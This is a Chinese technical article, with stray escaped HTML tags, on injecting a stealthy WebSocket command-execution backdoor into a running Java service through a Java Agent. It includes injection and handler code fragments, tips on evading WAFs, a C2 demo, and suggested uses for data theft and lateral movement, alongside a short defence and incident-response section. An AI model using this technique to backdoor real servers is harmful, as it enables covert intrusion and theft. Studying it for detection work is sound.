Java Agent 注入 WebSocket 技术详解<\/h1>

一、核心概念<\/h2>

1. Java Agent 基础<\/h3>

Java Agent 是一种特殊的 Java 程序，它能够在 JVM 启动时或运行时加载，用于监测、修改或增强其他 Java 程序的行为。主要涉及三个核心概念：<\/p>

premain<\/strong>：在 JVM 启动阶段调用的方法，通常用于静态加载 Agent<\/li>
agentmain<\/strong>：在 JVM 运行时动态加载 Agent 时调用的方法<\/li>

Instrumentation<\/strong>：提供修改类字节码、监控类加载等功能的 API<\/li> <\/ul>
2. 为什么选择 Java Agent + WebSocket<\/h3>

隐蔽性<\/strong>：相比传统内存马，Agent 注入不改动源码，更难被检测<\/li>
持久性<\/strong>：长期维持通信信道<\/li>
业务融合<\/strong>：可植入现有业务流程（如聊天系统、推送系统）<\/li>
绕过 WAF<\/strong>：WebSocket 协议本身能有效规避传统 WAF 检测<\/li> <\/ul>
二、技术实现<\/h2>
1. Agent 注入流程<\/h3>

连接目标 JVM<\/strong>：<\/p>

使用 VirtualMachine.attach(pid)<\/code> 连接到运行中的 Java 进程<\/li>
动态注入 Agent（避免静态注入易被检测的问题）<\/li> <\/ul> <\/li>
Agent 加载<\/strong>：<\/p> 实现 agentmain<\/code> 方法作为入口点<\/li> 获取 Instrumentation<\/code> 实例<\/li> <\/ul> <\/li> 类转换<\/strong>：<\/p> 使用 Instrumentation.addTransformer()<\/code> 注册类转换器<\/li> 在转换器中修改目标类的字节码<\/li> <\/ul> <\/li> <\/ol> 2. WebSocket 后门实现<\/h3> 关键组件：<\/h4> WebSocket 管理器<\/strong>：<\/p> 伪装成正常业务功能（如用户聊天、推送系统）<\/li> 负责建立和维护 WebSocket 连接<\/li> <\/ul> <\/li> 数据加密<\/strong>：<\/p> 使用 AES 对称加密算法<\/li> 加密所有通信数据（除初始命令外）<\/li> <\/ul> <\/li> 命令执行<\/strong>：<\/p> 实现 CommandHandler<\/code> 处理接收到的命令<\/li> 执行系统命令并返回结果<\/li> <\/ul> <\/li> 数据包设计<\/strong>：<\/p> 格式与正常业务数据包一致<\/li> 避免触发 WAF 规则<\/li> <\/ul> <\/li> <\/ol> 代码结构示例：<\/h4> \/\/ WebSocket 处理器核心代码 <\/span><\/span><\/span><\/span>public<\/span> class<\/span> WebSocketHandler<\/span> extends<\/span> WebSocketServlet {<\/span> <\/span><\/span> <\/span><\/span> \/\/ 加密通信 <\/span><\/span><\/span><\/span> private<\/span> AESUtil aesUtil =<\/span> new<\/span> AESUtil(<\/span>"your-secret-key"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> void<\/span> doMessage<\/span>(<\/span>WebSocket conn,<\/span> String message)<\/span> {<\/span> <\/span><\/span> \/\/ 解密消息 <\/span><\/span><\/span><\/span> String decrypted =<\/span> aesUtil.<\/span>decrypt<\/span>(<\/span>message);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 处理命令 <\/span><\/span><\/span><\/span> String result =<\/span> CommandHandler.<\/span>execute<\/span>(<\/span>decrypted);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 加密返回 <\/span><\/span><\/span><\/span> conn.<\/span>send<\/span>(<\/span>aesUtil.<\/span>encrypt<\/span>(<\/span>result));<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 构建配置<\/h3> Maven 关键依赖（pom.xml）：<\/p> <dependencies><\/span> <\/span><\/span> <\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.javassist<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>javassist<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.28.0-GA<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>javax.websocket<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>javax.websocket-api<\/artifactId><\/span> <\/span><\/span> <version><\/span>1.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.bouncycastle<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>bcprov-jdk15on<\/artifactId><\/span> <\/span><\/span> <version><\/span>1.68<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>注意<\/strong>：关键依赖需要直接打包进最终 JAR 文件。<\/p> 三、防御措施<\/h2> 1. 检测与防护<\/h3> JVM 参数配置<\/strong>：<\/p> 添加 -XX:+DisableAttachMechanism<\/code> 禁用 Attach 功能<\/li> 使用 -javaagent<\/code> 参数白名单<\/li> <\/ul> <\/li> 运行时监控<\/strong>：<\/p> 监控 VirtualMachine.attach<\/code> 调用<\/li> 检查非授权 Agent 加载<\/li> <\/ul> <\/li> 类加载审计<\/strong>：<\/p> 监控关键类的字节码修改<\/li> 检查 WebSocket 处理器的异常行为<\/li> <\/ul> <\/li> <\/ol> 2. 应急响应<\/h3> 识别异常 WebSocket 连接<\/strong>：<\/p> 检查非业务路径的 WebSocket 通信<\/li> 分析加密通信模式<\/li> <\/ul> <\/li> 清除恶意 Agent<\/strong>：<\/p> 使用 jcmd <pid> VM.command_line<\/code> 查看加载的 Agent<\/li> 重启受感染的 Java 服务<\/li> <\/ul> <\/li> <\/ol> 四、技术优势与局限<\/h2> 优势：<\/h3> 高隐蔽性<\/strong>：与业务深度融合，难以通过流量分析发现<\/li> 持久性<\/strong>：Agent 注入存活时间长，不受应用重启影响<\/li> 绕过能力<\/strong>：WebSocket + 加密有效规避传统安全设备<\/li> <\/ul> 局限：<\/h3> 需要目标系统启用 Attach 机制<\/li> 对高版本 Java 兼容性可能存在问题<\/li> 复杂的加密会增加 CPU 负载<\/li> <\/ul> 五、实战演示<\/h2> 1. 注入流程<\/h3> 启动 WebSocket C2 服务器<\/li> 定位目标 Java 进程 PID<\/li> 执行注入： VirtualMachine vm =<\/span> VirtualMachine.<\/span>attach<\/span>(<\/span>pid);<\/span> <\/span><\/span>vm.<\/span>loadAgent<\/span>(<\/span>"agent.jar"<\/span>,<\/span> "args"<\/span>);<\/span> <\/span><\/span>vm.<\/span>detach<\/span>();<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. 效果展示<\/h3> 正常业务中隐藏的 WebSocket 通信<\/li> 加密的命令执行结果返回<\/li> 系统监控中无明显异常进程<\/li> <\/ul> 六、扩展应用<\/h2> 业务逻辑劫持<\/strong>：修改现有 WebSocket 业务逻辑<\/li> 数据窃取<\/strong>：拦截敏感业务数据传输<\/li> 横向移动<\/strong>：作为跳板攻击内网其他系统<\/li> <\/ol> 七、总结<\/h2> Java Agent 注入 WebSocket 技术提供了一种高隐蔽性的持久化访问方式，通过 JVM 层面的修改和 WebSocket 协议的天然优势，能够有效规避传统安全检测。防御方需要从 JVM 安全配置、运行时监控和异常行为检测等多维度构建防护体系。<\/p>